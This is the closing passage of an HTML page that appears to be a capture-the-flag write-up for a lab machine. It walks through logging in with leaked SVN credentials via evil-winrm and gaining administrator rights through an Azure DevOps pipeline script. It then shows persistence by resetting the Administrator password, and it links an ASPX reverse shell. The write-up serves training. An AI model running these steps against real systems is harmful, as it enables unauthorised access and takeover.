# * = r</span></span></span></code></pre></li><li id="https://www.notion.so/af04de630c8e4ccfb221eb0cb03c011c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">W:\svnrepos\www\conf\passwd</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/2efe0a2a62c64bc58eb5379442be1f14" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>robisl = wolves11</span></span></span></code></pre></li><li id="https://www.notion.so/3d1ec98744304b73b64494bf2f3d0891" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found new credentials: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">robisl:wolves11</code></span></span></li><li id="https://www.notion.so/e6125120258c442dae516ea4f664fe0c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Remote into machine as robisl with evil-winrm:</span></span><div id="https://www.notion.so/6e062aef68794952a2ece47ff0c0385b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11</code></span></span></p></div></li><li id="https://www.notion.so/87ea0c612c2d4d8dbabc62637239dea7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/fe7daab9d7d9471eb91cd5ee739179f8" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/fe7daab9d7d9471eb91cd5ee739179f8"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/97c34a81735d4530bc12afa36b6e2e57" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Check directory listings, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ls -la</code></span><span class="SemanticString"> equivalent on PowerShell:</span></span><div id="https://www.notion.so/999ec27ea5c34802814b8a31be1c1990" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ Get-ChildItem -Force</code></span></span></p></div></li><li id="https://www.notion.so/4733ba29c0b147c7837aad2ccd167916" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Check user's privileged access, similar to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">sudo -l</code></span><span class="SemanticString"> but on PowerShell:</span></span><div id="https://www.notion.so/60fa9ab901d646edb2c7e94f0405927c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami /priv</code></span></span></p></div><div id="https://www.notion.so/0c1ac5e409f84d1c9e6df717b920c93a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Nothing of interest...</span></span></p></div></li><li id="https://www.notion.so/a028acb2b10746ba972de80fd462527a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Login to Azure DevOps as robisl using new credentials.</span></span></li><li id="https://www.notion.so/a4e267e2470541628f1284662ca965ef" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found new project in robisl's DevOps account: PartsUnlimited</span></span></li><li id="https://www.notion.so/11c9d6f49c274b95b2fed17eacb08210" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using DevOps' Pipelines module, we can execute arbitrary code.</span></span></li><li id="https://www.notion.so/7d9f04134fa44234a314441751cea65f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create a new starter pipeline on an unspecified pool, add robisl to the administrators group and print </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root.txt</code></span><span class="SemanticString"> flag:</span></span><div id="https://www.notion.so/88dba3c12ea645d48cd7999799f573c0" class="Image Image--PageWidth"><figure><a href="https://i.imgur.com/ShDqoM1.png?width=1133"><img src="https://i.imgur.com/ShDqoM1.png?width=1133" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><pre id="https://www.notion.so/b18e4c37dc514c8da032d7954e669633" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token comment">#pool = default</span>
<span class="token key atrule">steps</span><span class="token punctuation">:</span>
<span class="token punctuation">-</span> <span class="token key atrule">script</span><span class="token punctuation">:</span>
net localgroup administrators robisl /add
type C<span class="token punctuation">:</span>\Users\Administrator\Desktop\root.txt
<span class="token key atrule">displayName</span><span class="token punctuation">:</span> <span class="token string">'pwn'</span></span></span></span></code></pre></li><li id="https://www.notion.so/33e92fe0052c440bba232d54845b72ee" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Create pull request on a separate branch, create a new work item and self-approve the PR if needed.</span></span></li><li id="https://www.notion.so/d6515679a7f9403b817da2505d5a5d99" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Run pipeline to execute the payload:</span></span><pre id="https://www.notion.so/84a0a8fcfa374647adfb59b4fd70424b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token key atrule">Script contents</span><span class="token punctuation">:</span>
net localgroup administrators robisl /add
========================== Starting Command Output ===========================
<span class="token comment">##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\7f15fa97-c09c-4b50-be25-fa598fdfa45a.cmd""</span>
The command completed successfully.
<span class="token comment">##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\1fb5e08b-f36c-4bd4-8684-7895df0593ae.cmd""</span>
f71dca4e<span class="token punctuation">---</span><span class="token punctuation">---</span><span class="token punctuation">---</span><span class="token punctuation">---</span><span class="token punctuation">---</span><span class="token punctuation">-</span>068f6546</span></span></span></code></pre></li><li id="https://www.notion.so/b563275d99004f64b70d364f7747dde7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Check new group permissions:</span></span><div id="https://www.notion.so/7d2861f4442e4fabaf8116d2bf1839e5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ net user robisl</code></span></span></p></div><pre id="https://www.notion.so/1fc086d8dca441f7959448370c6fd435" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Local Group Memberships *Administrators *Production
*Remote Management Use
Global Group memberships *None</span></span></span></code></pre></li><li id="https://www.notion.so/b17c7490aadb434fba942032a23c9a0a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Rob is now in the Administrators group.</span></span></li><li id="https://www.notion.so/2fe001a988404f3b837118a4d7d4e2e9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/ce82617a9ab341b2b2b34603f7181a65" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/ce82617a9ab341b2b2b34603f7181a65"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/28330e29698e483c96de9f33acc4d3cc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Change Administrator password and enable remote use:</span></span><div id="https://www.notion.so/57890c64aeea48ae8974acd45675a9b4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ net localgroup "Remote Management Users" administrator /add</code></span></span></p></div><div id="https://www.notion.so/b3a2cc68a0f8459ab4c7abd6877cf74a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ net user administrator mango1010!</code></span></span></p></div></li><li id="https://www.notion.so/be1996f46f1d459699998e99c6889d34" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Remote into Administrator with evil-winrm:</span></span><div id="https://www.notion.so/816077dce0444ca89f29ef4a244def21" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ evil-winrm -i 10.10.10.203 -u Administrator -p mango1010!</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/db105b3c42aa48fa9cf2ca7ee317876c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/db105b3c42aa48fa9cf2ca7ee317876c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/1c2110e338a443b8b163f927bf9d4d5e" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx">https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx</a></span></span></li><li id="https://www.notion.so/cd0db8b319f0484db77842bdbcc3641a" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.youtube.com/watch?v=p7a25FEmd6A">https://www.youtube.com/watch?v=p7a25FEmd6A</a></span></span></li></ol><div id="https://www.notion.so/2976e01b4d64480db87d398d7bb0845b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>